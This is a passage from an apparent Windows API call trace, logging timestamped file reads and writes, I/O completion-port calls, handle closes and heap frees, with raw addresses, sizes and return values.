hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3510020) returned 0x0 [0159.432] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0159.432] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.432] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.432] ReadFile (in: hFile=0x1f0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3630020) returned 0x0 [0159.432] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0159.432] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.432] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0159.432] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0159.432] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.432] WriteFile (in: hFile=0x19c, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0159.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.436] ReadFile (in: hFile=0x1d4, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3990020) returned 0x0 [0159.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0159.436] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0159.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0159.436] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0159.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.436] CloseHandle (hObject=0x19c) returned 1 [0159.441] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0159.442] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.442] WriteFile (in: hFile=0x1d4, lpBuffer=0x3990094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3990020 | out: lpBuffer=0x3990094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3990020) returned 1 [0159.454] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.454] CloseHandle (hObject=0x1ac) returned 1 [0159.469] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3750020) returned 1 [0159.472] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0160.422] WriteFile (in: hFile=0x1e0, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x186f0, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x35a0020) returned 1 [0160.430] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0160.432] WriteFile (in: hFile=0x194, lpBuffer=0x3b40124*, nNumberOfBytesToWrite=0x584a, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3b40020 | out: lpBuffer=0x3b40124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3b40020) returned 1 [0160.459] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0160.461] WriteFile (in: hFile=0x1f0, lpBuffer=0x3900094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3900020 | out: lpBuffer=0x3900094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3900020) returned 1 [0160.467] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0160.467] CloseHandle (hObject=0x1a4) returned 1 [0160.479] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0160.482] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0160.482] CloseHandle (hObject=0x1a8) returned 1 [0160.521] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37e0020) returned 1 [0160.524] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0160.524] WriteFile (in: hFile=0x194, lpBuffer=0x3b40094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3b40020 | out: lpBuffer=0x3b40094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3b40020) returned 1 [0160.542] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0160.546] CloseHandle (hObject=0x194) returned 1 [0160.561] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3b40020) returned 1 [0160.563] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.059] CloseHandle (hObject=0x1c4) returned 1 [0168.082] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3cb0020) returned 1 [0168.085] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.145] ReadFile (in: hFile=0x1b8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 1 [0168.145] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.145] WriteFile (in: hFile=0x1b8, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0168.146] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.146] ReadFile (in: hFile=0x1b8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 0x0 [0168.146] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0168.146] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.146] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.146] WriteFile (in: hFile=0x1b8, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0168.146] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.146] CloseHandle (hObject=0x1b8) returned 1 [0168.149] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0168.150] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.624] ReadFile (in: hFile=0x198, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2690020) returned 1 [0168.625] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.625] ReadFile (in: hFile=0x1c4, lpBuffer=0x3680124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3680020) returned 1 [0168.625] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.625] ReadFile (in: hFile=0x194, lpBuffer=0x37a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x37a0020) returned 1 [0168.625] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.625] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x38c0020) returned 1 [0168.625] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.625] ReadFile (in: hFile=0x1d0, lpBuffer=0x39e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x39e0020) returned 1 [0168.626] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.626] ReadFile (in: hFile=0x1f4, lpBuffer=0x3b00124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3b00020) returned 1 [0168.626] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.626] ReadFile (in: hFile=0x1dc, lpBuffer=0x3c20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3c20020) returned 1 [0168.626] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.627] ReadFile (in: hFile=0x1ac, lpBuffer=0x3d40124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3d40020 | out: lpBuffer=0x3d40124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3d40020) returned 1 [0168.627] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.627] ReadFile (in: hFile=0x1b4, lpBuffer=0x3e60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3e60020 | out: lpBuffer=0x3e60124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3e60020) returned 1 [0168.627] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.627] ReadFile (in: hFile=0x1e0, lpBuffer=0x3f80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3f80020 | out: lpBuffer=0x3f80124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3f80020) returned 1 [0168.628] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.628] WriteFile (in: hFile=0x198, lpBuffer=0x2690124, nNumberOfBytesToWrite=0x15581, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020) returned 0x0 [0168.654] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.655] WriteFile (in: hFile=0x194, lpBuffer=0x37a0124, nNumberOfBytesToWrite=0x88a3, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0124, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x37a0020) returned 0x0 [0168.660] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.661] WriteFile (in: hFile=0x1d0, lpBuffer=0x39e0124, nNumberOfBytesToWrite=0xbc8f, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0124, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x39e0020) returned 0x0 [0168.666] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.666] WriteFile (in: hFile=0x1b4, lpBuffer=0x3e60124*, nNumberOfBytesToWrite=0x4ba8, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3e60020 | out: lpBuffer=0x3e60124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3e60020) returned 1 [0168.690] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0168.690] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b00020) returned 1 [0168.690] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0168.690] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3c20020) returned 1 [0168.690] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.690] WriteFile (in: hFile=0x198, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020) returned 1 [0168.707] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.708] ReadFile (in: hFile=0x1ac, lpBuffer=0x3d40124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3d40020 | out: lpBuffer=0x3d40124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3d40020) returned 0x0 [0168.708] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.708] ReadFile (in: hFile=0x1b4, lpBuffer=0x3e60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3e60020 | out: lpBuffer=0x3e60124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3e60020) returned 0x0 [0168.708] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.708] WriteFile (in: hFile=0x1f4, lpBuffer=0x3b00094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3b00020) returned 1 [0168.714] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.714] CloseHandle (hObject=0x1c4) returned 1 [0168.750] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3680020) returned 1 [0168.753] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.760] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d40094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3d40020 | out: lpBuffer=0x3d40094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3d40020) returned 1 [0168.793] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.793] WriteFile (in: hFile=0x1cc, lpBuffer=0x40a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x40a0020 | out: lpBuffer=0x40a0094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x40a0020) returned 1 [0168.829] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.829] CloseHandle (hObject=0x1cc) returned 1 [0168.862] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x40a0020) returned 1 [0168.865] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.948] ReadFile (in: hFile=0x1c8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 1 [0168.948] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0168.949] ReadFile (in: hFile=0x194, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, 